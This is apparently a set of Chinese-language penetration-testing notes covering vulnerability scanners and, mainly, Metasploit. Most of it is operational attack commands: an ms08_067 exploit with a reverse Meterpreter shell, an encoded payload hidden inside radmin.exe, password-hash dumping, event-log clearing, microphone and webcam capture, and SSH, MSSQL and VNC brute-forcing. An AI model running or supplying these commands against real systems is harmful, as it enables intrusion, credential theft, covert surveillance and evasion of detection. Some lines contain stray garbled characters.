漏洞扫描
- 查看漏洞命令:searchsploit tomcat (右边是漏洞使用说明书的路径)
- 安装openvas漏洞扫描:
下载安装包:apt-get install openvas
安装:openvas-setup
- 安装nessus:
http://www.tenable.com/products/nessus/select-your-operating-system
• 安装:dpkg –i
• 安装路径:/opt/nessus
• 启动服务 • /etc/init.d/nessusd start
• 管理地址 • https://127.0.0.1:8834
• 注册激活码 • http://www.tenable.com/products/nessus-home
- 安装:NEXPOSE(收费很贵,一年几十万)
WINDOWS 缓冲区溢出
- FUZZER(只针对xp、windowns2003低版本有用)
- • SLMail 5.5.0 Mail Server
- • ImmunityDebugger_1_85_setup.exe
- • mona.py
Shellcode攻击: shellcode是16进制的机器码, 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让其打开nc传输链接。利用软件漏洞获得特定的shellcode,再经由C或Python编写远程攻击程序,进而取得对方电脑的root权限
MSF工具:
- 启动: msfconsole –q ,msfdb start,db_status,db_connect –h /usr/share/metasploit-framework/modules/
- 基本使用方法:
- db_nmap 192.168.0.115,hosts,hosts 192.168.0.115
- db_disconnet / db_connect
- db_import /root/nmap.xml
- db_export -f xml /root/bak.xml
- 使用mysql_login模块:
- 进入模块: 1. Search mysql_login, 2.use auxilibary/scanner/mysql/mysql_login, 3. show options
- 使用模块: 1. Set USERNAME root , 2.set BLANK_PASSWORDS yes, 3. set RHOSTS 192.168.1.22, 4. show options, 5. Run 6.db_export –f xml /root/ msfbak.xml 7. Back
- 例如:
- 控制台命令:
- set / unset / setg / unsetg / save
- Run / exploit
- jobs / kill 0
- load / unload /loadpath
- session -l / -iҁShell ̵Meterpreter session̵VNC
- route指定session路由流量
- irb (Framework::Version)
- Resource (msfconsol -r a.rc)
- 生成Payload:
- 1. use payload/windows/shell_bind_tcp
- generate/ generate -b '\x00' (二进制编码,-b过滤坏字符)
- 生成payload: generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/ share/windows-binaries/radmin.exe -f /root/1.exe
- Meterpreter:反弹的shell控制
- 基本命令:Help̵、background、Run、bgrun、cd、ls、cat、pwd、dir、mkdir、mv、rm、rmdir、edit、lpwd、lcd、clearev、download -——upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 ——execute -f cmd.exe -i –H getduid、getsystem、getprivs、getproxy、getpid、Hashdump、run post/windows/gather/hashdump、sysinfo、ps、kill、migrate、reboot、shutdown、shell、show_mount、search -f autoexec.bat、arp、netstat、ipconfig、ifconfig、route、Idletime、resource、record_mic、webcam_list、webcam_snap -i 1 -v false
- Msfcli——2015年6月已经取消的框架:由命令msfconsole –x命令取代
- ▪ msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/ reverse_tcp; set LHOST 1.1.1.8; set LPORT 5555; set target 34; exploit"
- Auxiliary扫描模块
- search arp,use auxiliary/scanner/discovery/arp_sweep
- search portscan,use auxiliary/scanner/portscan/syn
- search udp_sweep/udp_probe ,use auxiliary/scanner/discovery/udp_sweep
- use auxiliary/scanner/ssh/ssh_version
- use auxiliary/scanner/ssh/ssh_login set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/ root_userpass.txt Ҕset VERBOSE false ;run(密码爆破)
- use auxiliary/scanner/ssh/juniper_backdoor (设备后门)
- use auxiliary/scanner/ssh/ssh_login_pubkey set KEY_FILE id_rsa ; set USERNAME root ;run(公钥登录)
- use auxiliary/scanner/mssql/mssql_ping(链接mssql)
- use auxiliary/scanner/mssql/mssql_login(爆破mssql)
- use auxiliary/admin/mssql/mssql_exec(远程执行)
- use auxiliary/scanner/vnc/vnc_login(密码破解)
- use auxiliary/scanner/vnc/vnc_none_auth,supported : None, free access!
- use auxiliary/scanner/rdp/ms12_020_check 远程桌面漏洞
- use auxiliary/scanner/smb/smb_version
- use auxiliary/scanner/smb/pipe_auditor
- use auxiliary/scanner/smb/pipe_dcerpc_auditor
- use auxiliary/scanner/smb/smb_enumshares
- use auxiliary/scanner/smb/smb_enumusers
- use auxiliary/scanner/smb/smb_lookupsid